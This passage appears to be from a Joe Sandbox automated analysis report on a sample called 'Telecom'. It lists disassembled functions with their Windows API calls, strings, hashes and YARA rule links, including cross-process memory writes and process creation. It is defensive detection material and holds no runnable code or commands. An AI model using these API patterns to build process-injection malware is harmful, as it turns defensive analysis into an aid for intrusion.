Opcode Fuzzy Hash: 94c068d4b38ae4778083f7644e1a71830aac06683dcd7fbae8f4794e319f2d7c
Instruction Fuzzy Hash: 3041A075E001059BCB00EFA5C881EAEBBB5FF59314F15806FE406A7391D7799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004A3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004ABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004A2B1D,?,?,00000034,00000800,?,00000034), ref: 004ABDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004A30AD

Part of subcall function 004ABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004A2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 004ABDBF

Part of subcall function 004ABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 004ABD1C
Part of subcall function 004ABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004ABD2C
Part of subcall function 004ABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004ABD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004A311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004A3167

Strings

@, xrefs: 004A317F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a022baa53e94f85cfe722821269ed0ac12f56515726996fe7b5510603b3ac851
Instruction ID: 18f417dde33fb556cdddfe345a9e35c7ee15a5edf698ea79b4f264af8b021ace
Opcode Fuzzy Hash: a022baa53e94f85cfe722821269ed0ac12f56515726996fe7b5510603b3ac851
Instruction Fuzzy Hash: C4412D72900218BFDB11DFA5CD81ADEB7B8EF56704F00409AF945B7181DA746F45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004ACB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004ACBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 004ACBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005129C0,01495B28), ref: 004ACC40

Strings

0, xrefs: 004ACB8A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 7dacb80064f93d34bd64978f30012033789e7248890c93ceb806ddfed4e7fda9
Instruction ID: b6a860f0a908719e252c2d2b5557fa37c09b27dc7227b1141d884ec1f13fd080
Opcode Fuzzy Hash: 7dacb80064f93d34bd64978f30012033789e7248890c93ceb806ddfed4e7fda9
Instruction Fuzzy Hash: 0941C0712043029FD720DF29D8C4B5BBBE8AF96724F04461EF4A597391D738E904CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004D4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004DDCD0,00000000,?,?,?,?), ref: 004D4F48
GetWindowLongW.USER32 ref: 004D4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004D4F75

Strings

SysTreeView32, xrefs: 004D4F1A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 7398372b59ec655db185312ed1818759cc8715b1b6ca367ca0dbb4c4e9f28f3d
Instruction ID: 688fcfae1d5840612dea7e118d81e1d48bb2edf469cacc01090aed57ff14acd4
Opcode Fuzzy Hash: 7398372b59ec655db185312ed1818759cc8715b1b6ca367ca0dbb4c4e9f28f3d
Instruction Fuzzy Hash: 7A319E71610205AFDB208F38CC55BEB77A9EB48328F24472BF975922E0C778AC509B58

Uniqueness

Uniqueness Score: -1.00%

Function 004D4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004D49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004D49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 004D4A14

Strings

SysMonthCal32, xrefs: 004D49A7

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 6228cf20fec24f5cfc6991c02e2ab4d8c8dd8a9f2b1c3f1d5f2f662a598f1d3c
Instruction ID: 8159c5ebba4cfb763406e018e683ba4404e110751c041930604010d931970c7c
Opcode Fuzzy Hash: 6228cf20fec24f5cfc6991c02e2ab4d8c8dd8a9f2b1c3f1d5f2f662a598f1d3c
Instruction Fuzzy Hash: C721F332600219BBDF118F60CC52FEF3B69EF88718F110216FA056B2D0D6B5E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004D50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004D51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004D51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004D51B8

Strings

msctls_updown32, xrefs: 004D5122

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: dccddcb9f46ddc4ba92be0b0f928a0f7af048d3eeb84a11c5608da10c171b25b
Instruction ID: c4732324e0000e61abb3a549fcf95160e105816dd90fa0bf3383443d27cf2252
Opcode Fuzzy Hash: dccddcb9f46ddc4ba92be0b0f928a0f7af048d3eeb84a11c5608da10c171b25b
Instruction Fuzzy Hash: 712151B5A01609AFDB10DF28CC91DBB37ADEB5A368B04015BF90097361CB74EC55DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 004D4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004D42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004D42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004D4312

Strings

Listbox, xrefs: 004D42AB

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: e54bdf8f1226e38c601efe8162537675d9fc27e9d5bae95fdbfad7933cf7c304
Instruction ID: 6a73cd56d6875d99d5c6ecc77a7596c48158eb8524f9a3eccf43004cc7de582c
Opcode Fuzzy Hash: e54bdf8f1226e38c601efe8162537675d9fc27e9d5bae95fdbfad7933cf7c304
Instruction Fuzzy Hash: 9321C232610218BBEF118F94CC84FBF3B6EEFC97A4F118126F9009B290C6759C5287A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004B544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004B54A1
SetErrorMode.KERNEL32(00000000,?,?,004DDCD0), ref: 004B5515

Strings

%lu, xrefs: 004B54B4

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 4fbfa44bb3a564ed800e69407113f228648e1b46951b130cd97d17c6f44cd8ab
Instruction ID: 60f396a9b94b7d1b6aa117cddd0515b1022861afbec06a57c0832cd2defdea68
Opcode Fuzzy Hash: 4fbfa44bb3a564ed800e69407113f228648e1b46951b130cd97d17c6f44cd8ab
Instruction Fuzzy Hash: 99314170A00109AFD710DF65C985EAEB7F8EF05308F1440AAE809DB362D775EE45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004D8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 004D8339
EnumChildWindows.USER32(?,004D802F,00000000), ref: 004D83B0

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

Strings

(Q, xrefs: 004D834A
(Q, xrefs: 004D8317

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: (Q$(Q
API String ID: 3814560230-1236427130
Opcode ID: d48d9b9a6004d99e9f89a9d23ba9f8b18099b57f5d1e8a728d10cdeeb251204a
Instruction ID: 9eb6bb288a81a0864dc9283a9d5e3688aff43a31433ca7e084b3883ae0848cab
Opcode Fuzzy Hash: d48d9b9a6004d99e9f89a9d23ba9f8b18099b57f5d1e8a728d10cdeeb251204a
Instruction Fuzzy Hash: 1C214874200205DFC724DF28E850AA6B7E5FB59720F20461EE879C73A0DB75A8A1DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004D4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004D4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004D4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004D4D0F

Strings

msctls_trackbar32, xrefs: 004D4CC4

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 9cd20c11511372e41f26c4b33f646677f1a214d2a1b2e167f273957a7a4acb8f
Instruction ID: 12fa68f0abfbdb26e95d7b8682378a86d46d3541a63908902623ef0aca65afad
Opcode Fuzzy Hash: 9cd20c11511372e41f26c4b33f646677f1a214d2a1b2e167f273957a7a4acb8f
Instruction Fuzzy Hash: 06112331240208BFEF205F65CC06FAB3BA9EF85B24F11012AFA40E22A0C275D8519B24

Uniqueness

Uniqueness Score: -1.00%

Function 004D6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004D6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004D638D
DrawMenuBar.USER32(?), ref: 004D639C

Strings

0, xrefs: 004D632E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 9e7b4ce9e721c05db97b72f0193ba68e7748829a74a9233cddc040daf1a16488
Instruction ID: d74110ef963ebcae35d06eefa1acf338b5659ce03e21b68016c379a7fb942bda
Opcode Fuzzy Hash: 9e7b4ce9e721c05db97b72f0193ba68e7748829a74a9233cddc040daf1a16488
Instruction Fuzzy Hash: 05016D31500218AFDF219F11DC84BAF7BB8FB45355F14809BE84AD6250DF348A85EF26

Uniqueness

Uniqueness Score: -1.00%

Function 004D823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,005128E0,004DAD55,000000FC,?,00000000,00000000,?), ref: 004D823F
GetFocus.USER32 ref: 004D8247

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 004D82B4

Strings

(Q, xrefs: 004D8254

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (Q
API String ID: 3601265619-2768264020
Opcode ID: 45fb9612281a941945c9a388495958d0e6cf8d52a4b68031d6636e1df2110430
Instruction ID: c1726314d809bd9d9c7d30f6693d2466d3a820f06ad28d086eaba8dd9bb9a610
Opcode Fuzzy Hash: 45fb9612281a941945c9a388495958d0e6cf8d52a4b68031d6636e1df2110430
Instruction Fuzzy Hash: C2015E31602900DFC725DB68D854ABA37E6EBC9324F1442AFE416873A4CB356C5BCB54

Uniqueness

Uniqueness Score: -1.00%

Function 004D8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 004D8576
CreateAcceleratorTableW.USER32(00000000,?,?,?,004BBE96,00000000,00000000,?,00000001,00000002), ref: 004D858C
GetForegroundWindow.USER32(?,004BBE96,00000000,00000000,?,00000001,00000002), ref: 004D8595

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

Strings

(Q, xrefs: 004D8532

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (Q
API String ID: 986409557-2768264020
Opcode ID: 22ea3a32f766b2c7d66869edf34ee46735d40722578147373240b10f5334951a
Instruction ID: f6672cb1237f66955ebd7673b5e61aefd119fe929e4d6cd365fcc22e3cd6a868
Opcode Fuzzy Hash: 22ea3a32f766b2c7d66869edf34ee46735d40722578147373240b10f5334951a
Instruction Fuzzy Hash: 59012D30602354EFCB249F69ECA4AA637F5FB14325F10862FF511863B0DB34A9A4DB49

Uniqueness

Uniqueness Score: -1.00%

Function 004D8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00514038,0051407C), ref: 004D8C1A
CloseHandle.KERNEL32 ref: 004D8C2C

Strings

|@Q, xrefs: 004D8BE5
8@Q, xrefs: 004D8BD6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@Q$|@Q
API String ID: 3712363035-2456117094
Opcode ID: 4c6f63e936ae5b00b0d97263ef4d045d9ce414c5f5129a88155fa359d412e477
Instruction ID: db5f4a1bbb9680f3dec44514e23e9378b99772423d1d6bc5c95351955a5eb3d3
Opcode Fuzzy Hash: 4c6f63e936ae5b00b0d97263ef4d045d9ce414c5f5129a88155fa359d412e477
Instruction Fuzzy Hash: BBF03AB2581204BEF7106B62AC4DFB73E9CEB19755F005026BB08DA1A1E66548149BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0049E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0049E797
FreeLibrary.KERNEL32 ref: 0049E7BD

Strings

X64, xrefs: 0049E680
GetSystemWow64DirectoryW, xrefs: 0049E791

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 5b96960553a9fa81db7659e758251642efc8b599bc225d592baa85a109c79b30
Instruction ID: 772037d2ad69baac3beb533bbeaadc8941f19cd11a267f56f1e0cad08fee36a8
Opcode Fuzzy Hash: 5b96960553a9fa81db7659e758251642efc8b599bc225d592baa85a109c79b30
Instruction Fuzzy Hash: E0E02B71C12511DBDB7186214C44FAE3A14BF21B01B5506B7EC41E2244DB2CCD4A865E

Uniqueness

Uniqueness Score: -1.00%

Function 004A096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e85d3f5e1567c1af56563e9699417e054ebab52c900421a6382f120c2e59886
Instruction ID: 2e274339b613b7fe71173fd120d51f36b86f3f4975c6165fa4fb6dc64f826942
Opcode Fuzzy Hash: 7e85d3f5e1567c1af56563e9699417e054ebab52c900421a6382f120c2e59886
Instruction Fuzzy Hash: D2C18C75A0020AEFDB04CF94C884EAEB7B5FF59718F10819AE405EB251D735EE82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004741F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0047427E
__alldvrm.LIBCMT ref: 0047447F
__alldvrm.LIBCMT ref: 004744A1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: fd5d735ebbb91c2a2416e64ecb0f220d381c872c5de80d7b622565e2ae0e238e
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 4DA12571A002859FDB21CE58C8917FEBBE5EF91314F2481AEE95D9B381C33C8941C759

Uniqueness

Uniqueness Score: -1.00%

Function 004A0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0EF8
CLSIDFromProgID.OLE32(?,?,00000000,004DDCE0,000000FF,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0F1D
_memcmp.LIBVCRUNTIME ref: 004A0F3E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: cf92f8e7b63dca8c77997f149043c5185e7d94837991fdadc71efd6e3336d6e6
